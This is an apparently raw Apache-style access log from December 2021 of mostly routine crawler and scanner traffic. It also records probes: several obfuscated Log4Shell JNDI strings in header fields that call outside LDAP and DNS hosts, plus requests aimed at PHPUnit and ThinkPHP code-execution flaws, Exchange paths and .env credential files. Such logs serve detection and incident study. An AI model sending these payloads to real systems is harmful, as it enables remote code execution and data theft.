45.83.66.185 - - [13/Dec/2021:01:52:37 +0100] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D HTTP/1.1" 400 293 "${jndi:dns://45.83.64.1/securityscan-https443}" "${jndi:dns://45.83.64.1/securityscan-https443}" 52.25.181.149 - - [13/Dec/2021:02:06:26 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 35.85.136.175 - - [13/Dec/2021:02:07:03 +0100] "GET /favicon.ico HTTP/1.1" 301 302 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 35.85.136.175 - - [13/Dec/2021:02:07:08 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 45.83.66.114 - - [13/Dec/2021:02:45:51 +0100] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D HTTP/1.1" 400 293 "${jndi:dns://45.83.64.1/securityscan-https443}" "${jndi:dns://45.83.64.1/securityscan-https443}" 45.146.164.160 - - [13/Dec/2021:03:27:31 +0100] "GET / HTTP/1.1" 301 301 "-" "${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164.160:8081/w}" 192.241.205.41 - - [13/Dec/2021:03:53:43 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 348 "-" "Mozilla/5.0 zgrab/0.x" 192.241.204.237 - - [13/Dec/2021:04:13:20 +0100] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 301 335 "-" "Mozilla/5.0 zgrab/0.x" 92.118.160.9 - - [13/Dec/2021:04:45:34 +0100] "GET / HTTP/1.1" 301 391 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 131.220.6.152 - - [13/Dec/2021:04:54:17 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 192.236.176.139 - - [13/Dec/2021:05:09:05 +0100] "GET /wp-content/plugins/capability-manager-enhanced/common/js/admin.dev.js HTTP/1.1" 301 446 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36" 193.106.29.210 - - [13/Dec/2021:06:46:34 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" 13.57.208.83 - - [13/Dec/2021:07:41:13 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" 195.54.160.149 - - [13/Dec/2021:07:41:58 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.149 - - [13/Dec/2021:09:11:38 +0100] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 301 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 80.92.204.210 - - [13/Dec/2021:09:34:10 +0100] "POST /ecp/n.js HTTP/1.1" 301 391 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 195.54.160.149 - - [13/Dec/2021:09:36:29 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 301 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 221.226.159.22 - - [13/Dec/2021:09:48:28 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 221.226.159.22 - - [13/Dec/2021:09:48:28 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 221.226.159.22 - - [13/Dec/2021:09:48:30 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 221.226.159.22 - - [13/Dec/2021:09:48:31 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 88.130.38.6 - - [13/Dec/2021:09:57:06 +0100] "GET / HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36" 184.105.247.195 - - [13/Dec/2021:10:25:19 +0100] "GET / HTTP/1.1" 301 383 "-" "-" 91.121.233.201 - - [13/Dec/2021:11:33:13 +0100] "POST /ecp/Zi.js HTTP/1.1" 301 392 "-" "Mozilla/5.0 (iPad; CPU OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1" 195.54.160.149 - - [13/Dec/2021:11:56:24 +0100] "GET /console/ HTTP/1.1" 301 307 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.149 - - [13/Dec/2021:12:43:13 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 301 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 207.46.13.127 - - [13/Dec/2021:13:03:32 +0100] "GET / HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 147.182.156.12 - - [13/Dec/2021:13:15:25 +0100] "GET / HTTP/1.1" 301 301 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}" 192.241.214.25 - - [13/Dec/2021:13:20:18 +0100] "GET /actuator/health HTTP/1.1" 301 310 "-" "Mozilla/5.0 zgrab/0.x" 147.182.148.26 - - [13/Dec/2021:13:21:24 +0100] "GET / HTTP/1.1" 301 301 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}" 139.162.145.250 - - [13/Dec/2021:13:34:56 +0100] "GET /bag2 HTTP/1.1" 301 304 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" 92.118.160.37 - - [13/Dec/2021:13:57:41 +0100] "GET / HTTP/1.1" 301 389 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 195.54.160.149 - - [13/Dec/2021:14:38:51 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.149 - - [13/Dec/2021:15:29:24 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 54.88.109.231 - - [13/Dec/2021:16:01:33 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/56.0.3061.110 Safari/537.32" 54.88.109.231 - - [13/Dec/2021:16:01:39 +0100] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" 54.88.109.231 - - [13/Dec/2021:16:01:39 +0100] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" 54.88.109.231 - - [13/Dec/2021:16:01:41 +0100] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" 54.88.109.231 - - [13/Dec/2021:16:01:41 +0100] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" 54.88.109.231 - - [13/Dec/2021:16:01:42 +0100] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" 54.88.109.231 - - [13/Dec/2021:16:01:42 +0100] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" 54.88.109.231 - - [13/Dec/2021:16:01:43 +0100] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" 54.88.109.231 - - [13/Dec/2021:16:01:43 +0100] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" 109.237.103.123 - - [13/Dec/2021:18:10:57 +0100] "GET /.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 109.237.103.123 - - [13/Dec/2021:18:10:58 +0100] "POST /.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 167.94.138.114 - - [13/Dec/2021:18:29:57 +0100] "GET / HTTP/1.1" 301 383 "-" "-" 167.94.138.114 - - [13/Dec/2021:18:29:57 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 92.118.160.61 - - [13/Dec/2021:18:30:11 +0100] "GET / HTTP/1.1" 301 377 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 192.241.208.136 - - [13/Dec/2021:18:44:22 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 zgrab/0.x" 45.146.164.160 - - [13/Dec/2021:19:23:33 +0100] "GET / HTTP/1.1" 301 301 "-" "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160:1389/t}" 45.146.164.160 - - [13/Dec/2021:19:23:33 +0100] "GET / HTTP/1.1" 301 301 "-" "${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}" 45.146.164.160 - - [13/Dec/2021:19:23:37 +0100] "GET / HTTP/1.1" 301 301 "-" "${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}" 45.146.164.160 - - [13/Dec/2021:19:23:38 +0100] "GET / HTTP/1.1" 301 301 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}" 112.74.52.90 - - [13/Dec/2021:21:33:54 +0100] "GET / HTTP/1.1" 301 301 "-" "/${jndi:ldap://45.83.193.150:1389/Exploit}" 154.198.211.135 - - [13/Dec/2021:22:17:57 +0100] "GET / HTTP/1.1" 301 383 "-" "-" 154.198.211.135 - - [13/Dec/2021:22:18:03 +0100] "GET /favicon.ico HTTP/1.1" 301 309 "-" "Go-http-client/1.1" 154.198.211.135 - - [13/Dec/2021:22:18:22 +0100] "GET /robots.txt HTTP/1.1" 301 308 "-" "Go-http-client/1.1" 154.198.211.135 - - [13/Dec/2021:22:18:41 +0100] "GET /sitemap.xml HTTP/1.1" 301 309 "-" "Go-http-client/1.1" 192.241.207.72 - - [14/Dec/2021:00:41:25 +0100] "GET /owa/auth/logon.aspx HTTP/1.1" 301 314 "-" "Mozilla/5.0 zgrab/0.x" 71.6.232.7 - - [14/Dec/2021:00:41:42 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" 198.199.95.200 - - [14/Dec/2021:00:42:45 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 348 "-" "Mozilla/5.0 zgrab/0.x" 192.241.208.61 - - [14/Dec/2021:00:44:50 +0100] "GET /owa/auth/x.js HTTP/1.1" 301 310 "-" "Mozilla/5.0 zgrab/0.x" 35.195.93.98 - - [14/Dec/2021:00:47:21 +0100] "GET / HTTP/1.1" 301 301 "-" "python-requests/2.26.0" 207.46.13.237 - - [14/Dec/2021:00:51:25 +0100] "GET /robots.txt HTTP/1.1" 301 311 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 207.46.13.237 - - [14/Dec/2021:00:51:26 +0100] "GET /robots.txt HTTP/1.1" 301 311 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 207.46.13.127 - - [14/Dec/2021:00:51:32 +0100] "GET / HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"